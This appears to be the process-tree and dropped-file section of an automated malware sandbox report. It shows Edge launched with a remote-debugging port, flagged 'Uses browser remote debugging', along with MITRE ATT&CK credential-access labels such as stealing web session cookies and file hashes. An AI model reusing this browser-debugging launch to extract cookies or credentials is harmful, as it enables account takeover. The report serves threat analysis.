C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2252,i,16339685131422486527,13678934012158994883,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:35⤵PID:4504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2296,i,16339685131422486527,13678934012158994883,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2508 /prefetch:85⤵PID:3048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,16339685131422486527,13678934012158994883,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:15⤵
- Uses browser remote debugging
PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,16339685131422486527,13678934012158994883,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:15⤵
- Uses browser remote debugging
PID:4644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4960,i,16339685131422486527,13678934012158994883,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4932 /prefetch:15⤵
- Uses browser remote debugging
PID:1812
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2880
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:2436
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5af887159bcd239936000393c0018a739
SHA1fc1f15093a23fdddd5baee5d56d8b1cf5fa8ed17
SHA2569a9807b0058ca53ada20607559ff167805ef83c12a9ddeaffd94e8dd0d2e9bf0
SHA5127d06ba2040edb166076b833040507ce02d9ca28eda854c9320b4061cc5459b92a0a30f4aa93fc8860391975df3e6140a026fe2a9b87ead1cd2c4df619d75e453
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5c4660d0625090552b752db7fd677a411
SHA188eb3fd8966afc7db6fbabf42c04490f78a38df0
SHA256eaee980f180e1ff5cad876dfca406b17cebaeabb7c3b232f1ddb79ba8072284c
SHA512733d1653b721f48ea69c4d4d0f40f9b1af8c2a05bd924bc2f93be04ca4357f793f9cbb20433a74c14c87800627803c02ac9072db542e1372a8b28225f087584c
-
Filesize
280B
MD560d40d2b37759323c10800b75df359b8
SHA1f5890e7d8fc1976fe036fea293832d2e9968c05c
SHA256c3a2f26d5aef8b5ed1d23b59ed6fce952b48194bed69e108a48f78aec72126e0
SHA5120c339563594cc9f930a64903281589886308d4412ee267e976520a58d86b2c339d7b2320e1b3fd6fbf81f092ff1735f0710c669af2986ea5b63d2c1e0a6df902
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index
Filesize1KB
MD5ae46c0e139c7acce8d60b8c345649f05
SHA13ca5ad5cd19a61ecd20a2c0d3da280653accf699
SHA25668c746b1223a6672300087740a7596b28d1499daeeb4ee9db73d1e1f4019f4fa
SHA512832c5b0d8046620d4e6d3589aa894b73dca3dfa633020199e4dab633501ed75002255fa32b087124414be867d7a00e166a523fbecaf48f38b2cf1a2b973dcec2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index~RFe57974e.TMP
Filesize1KB
MD5a99dbe83f4da7d0b3ac4790e4765c62c
SHA1698a1993e81f17fad8885f041409fccf002c470f
SHA25640057c76149406eb9c45d493cac40eb13efd00767915a8682d6c1170edf21c81
SHA512a88185a257f2a7489d266e330e2cd398aa826cd28d04ebcf3b0f0e67476f83f3dfe45d622ff952479f34e5ab5ce7be114ecd83b449c4f567db32f33c444d4f92
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c99af8bd-b24d-4ce8-a0fb-93a9cdacb725.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
39KB
MD590659a4a8d1454f2d2e90a6b48542828
SHA1b1ad8f555ea51f75818453b528872fce3c8290a8
SHA2565e76924e8490adb815ede04bc366fac6f133f4fc6ebe294a7babda317ee9b910
SHA5126f83e0f5f4a74646cde5ef17c447b7248017170a938a4578fa3491dd8c6724a3013d2e8e3c640e696bbfcbd8c0610414502db4e8224bf68c574bdf47ab7478b9
-
Filesize
40KB
MD5881277a33303e9ce31c7ba8ceecc000a
SHA1a0221ee3e789d4b425fb76c2bb739e7f632ecf39
SHA256b52f0ed07191ca80d18cc6a61a5a57b9bcdd086805ab8e72ccfd6b5497c3fe71
SHA5122a05aa3d2563afd036308da401542c296f617372c6a52c4541f07e0263c0b0d969bc0e06a2ae702db6ad7822cacc52c1534085ed0aa59aa4b6b924d1f6a02a6d
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
286B
MD5754ad3e497d88af1e8f67091652b5c86
SHA154aa778c52d917695475eef4694e2346ef4d07ea
SHA256e0d07f5a7f515ba2108597dc7c258717cbc5a99d14392b1fc9f3af8ad920fa1b
SHA5122c4d11a2d08b17dd10e92a3b55592dd9d52a426f721ee1bc1576f9cb37602ba4575b4041d74d753ecf12b4aa45c0684007788eba9eb9b49afb287aa334a8e2da
-
Filesize
5.7MB
MD57cbfcf1b8eb95b00a52c8545858247f4
SHA1144a1e5ef70cc427c9eab0bdbe750029a8b1f311
SHA2566a285a9511a2eea7d847566cfc5b5e2b79d1b8f173d134da7f90f8b6017d2f5d
SHA512b6cb800865689d30ef598d3fc4f21fd838557448dc1b295a8cbdd1282c9b78e4ca120b4f8d27e6ca0194c6ec8c9255c565150e880834f2f9a8dc3001a24d4f68